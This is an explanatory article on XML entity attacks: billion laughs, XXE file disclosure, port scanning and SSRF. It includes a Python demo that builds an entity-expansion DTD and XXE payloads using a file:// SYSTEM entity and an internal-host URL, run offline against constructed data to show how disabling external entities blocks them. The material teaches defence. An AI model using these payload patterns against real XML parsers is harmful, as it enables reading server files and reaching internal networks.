The most basic XML-based attack, although not strictly an external entity attack, is the so-called "billion laughs" attack. Most modern XML parsers mitigate it by capping entity expansion, but it still illustrates how XML entity attacks work. The attack starts from a DOCTYPE definition that declares one small entity and then a chain of further entities, each of which references the previous one several times. The XML parser expands every reference in turn, generating a large number of "lol" strings. A small version of the DOCTYPE generates several hundred of them, but a full-scale version expands to billions of characters, exhausting memory on the server. An alternative way to achieve the same effect is to reference an endless data source, such as the /dev/urandom device on Linux, so that the parser never finishes reading the entity.

XML attacks get more interesting when external entities are involved. An external entity, declared in the attacker-supplied document or in a DTD hosted on a server the attacker controls, can reference URIs on the target server itself, so the parser reads sensitive content from the local file system and places it in the document. Sensitive system files live at well-known paths on most servers, which makes this an easy endeavor for attackers: on a vulnerable Linux system, for example, an entity whose SYSTEM identifier points at the file that defines login settings returns that file's content wherever the entity is used.

Another important element of XXE attacks is that they can be used to scan ports or retrieve data from other hosts reachable from the target system. For example, if the target system can connect to a file server at IP address 10.0.0.5, the attacker can retrieve sensitive data from that server by pointing the entity's URI at it.

SSRF Attacks

Attackers can use XXE attacks for more than retrieving sensitive data. Another possible impact is that XXE can be used to perform server-side request forgery (SSRF). In an SSRF attack, the attacker exploits a server-side application to make HTTP requests to any URL the server can reach. To perform SSRF via an XXE vulnerability, the attacker defines an external XML entity whose URI is the target they want the server to reach, and uses that entity in a data value. If the attacker manages to get this data value into an application response, they can see the content of the URL in that response, which allows two-way interaction with the backend system. If no application response is available, the attacker can still perform a blind SSRF attack: the server still issues the request, even though its result is never shown. The external entity in that case simply names the URL of an internal system within the organization's network, and the server's parser makes the backend HTTP request on the attacker's behalf.
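The three mechanisms described above (entity-expansion blow-up, a SYSTEM entity reading a local file, and a SYSTEM entity making the server fetch an internal URL) as one added example; this is not code from the original article. It uses Python's standard-library xml.sax parser. The secret file contents, the /admin/config path, and the canned reply are constructed for the demo; 10.0.0.5 is the address the article itself uses. The entity-resolver class stands in for the network so the whole thing runs offline.

```python
"""Added example (not from the original article): entity expansion cost
and external-entity resolution in Python's standard-library XML stack.
Every input below is constructed for the demo."""
import os
import pathlib
import re
import tempfile
import xml.sax
from io import BytesIO, StringIO
from xml.sax import handler, xmlreader

# ---- 1. Billion laughs: measure the blow-up without performing it ----
# Matches internal entities only; SYSTEM/PUBLIC entities have no literal value.
ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
REF_RE = re.compile(r"&(\w+);")


def build_lol_dtd(depth=9, fanout=10):
    """Classic billion-laughs internal subset: lol1 = fanout x &lol;,
    lol2 = fanout x &lol1;, ... up to lol<depth>."""
    decls = ['<!ENTITY lol "lol">']
    prev = "lol"
    for i in range(1, depth + 1):
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
        prev = f"lol{i}"
    return "".join(decls)


def entity_expansion_sizes(dtd):
    """Map each internal entity to the length of its fully expanded text.
    A &ref; counts as the expanded length of the referenced entity, not its
    literal characters; this is the bookkeeping a modern parser's
    amplification limit performs before it refuses the document."""
    defs = dict(ENTITY_RE.findall(dtd))
    memo = {}

    def size(name, stack=()):
        if name in stack:  # XML 1.0 forbids recursive entity references
            raise ValueError(f"entity {name!r} is recursive")
        if name not in memo:
            text = defs[name]
            total = len(REF_RE.sub("", text))
            for ref in REF_RE.findall(text):
                total += size(ref, stack + (name,))
            memo[name] = total
        return memo[name]

    return {name: size(name) for name in defs}


# ---- 2. External entities: local file read and SSRF-style fetch ----
SECRET = "db_user=app\ndb_pass=constructed-demo-password\n"  # constructed


class _TextCollector(handler.ContentHandler):
    """Collects character data, including text pulled in from an external
    entity, the way a vulnerable application echoes it back."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class _RecordingResolver(handler.EntityResolver):
    """Stands in for the network: records each URI the parser tries to
    fetch and answers with canned bytes, so the demo never leaves the host."""
    def __init__(self, canned):
        self.canned = canned
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = xmlreader.InputSource(systemId)
        src.setByteStream(BytesIO(self.canned.encode()))
        return src


def parse_untrusted(xml_text, allow_external=False, resolver=None):
    """Parse attacker-controlled XML and return the text the handler saw.
    allow_external=True restores the pre-3.7.1 xml.sax default that made it
    vulnerable to XXE; False is the hardened setting (set it explicitly)."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, allow_external)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    if resolver is not None:
        parser.setEntityResolver(resolver)
    parser.parse(StringIO(xml_text))
    return "".join(collector.parts)


def demo_file_read():
    """Leak a constructed secret file through a SYSTEM entity. Returns
    (text with externals enabled, text with externals disabled)."""
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as fh:
        fh.write(SECRET)
    try:
        uri = pathlib.Path(fh.name).as_uri()  # file:///... as in a real payload
        payload = f'<!DOCTYPE d [<!ENTITY xxe SYSTEM "{uri}">]><d>&xxe;</d>'
        return (parse_untrusted(payload, allow_external=True),
                parse_untrusted(payload, allow_external=False))
    finally:
        os.unlink(fh.name)


def demo_ssrf(allow_external=True):
    """Point the entity at an internal host (10.0.0.5 from the article; the
    /admin/config path is assumed). Returns (echoed text, URIs fetched); the
    URI list fills even if nothing is echoed, which is the blind-SSRF case."""
    resolver = _RecordingResolver("canned reply from the internal host")
    payload = ('<!DOCTYPE d [<!ENTITY xxe SYSTEM "http://10.0.0.5/admin/config">]>'
               '<d>&xxe;</d>')
    return parse_untrusted(payload, allow_external, resolver), list(resolver.requested)


if __name__ == "__main__":
    print("lol9 expands to", entity_expansion_sizes(build_lol_dtd())["lol9"], "chars")
    print("file read:", demo_file_read())
    print("ssrf:", demo_ssrf(), demo_ssrf(allow_external=False))
```

The DOCTYPE that build_lol_dtd produces is about 700 bytes, yet lol9 expands to three billion characters, which is exactly the ratio an amplification limit is there to catch. In demo_ssrf the recorded URI is the point: with externals enabled the server asks 10.0.0.5 for the resource whether or not the application ever echoes the reply, so a blind attack still has a side effect on the internal network. With the feature disabled both demos return empty text and no request is recorded.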